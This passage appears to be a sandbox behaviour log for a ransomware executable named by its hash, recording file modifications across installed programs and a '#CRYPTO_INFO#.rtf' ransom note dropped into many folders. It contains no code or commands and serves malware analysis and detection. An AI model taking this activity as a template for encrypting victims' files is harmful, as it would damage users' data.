DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_hu.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\omni.ja 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\iw_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.ssl_1.0.0.v20140827-1444.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter-default_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\security\blacklisted.certs 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\tl.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\IA32.api 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluEmptyStateDCFiles_280x192.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_fr.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_share_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\cs_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\adobe_sign_tag_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\RHP_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-sl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\example_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.zh_CN_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\download.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-gb\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\ReceiveRename.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\playstore.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\es-419.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sl-sl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.ja_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jre1.8.0_66\lib\management\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.json 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\tesselate.x3d 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-down-pressed.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app-api\dev\app-api.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\_platform_specific\win_x64\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Cloud Services.pdf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui_2.3.0.v20140404-1657.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sk.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\FindJoin.vdw 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\epl-v10.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_es.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-io-ui.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\db\bin\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.preferences_3.5.200.v20140224-1527.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\extensions\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\da_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\example_icons2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\AddressBook2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\DarkTheme.acrotheme 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\kn.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jre1.8.0_66\lib\cmm\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\example_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_hover_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\elevation_service.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\x_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files 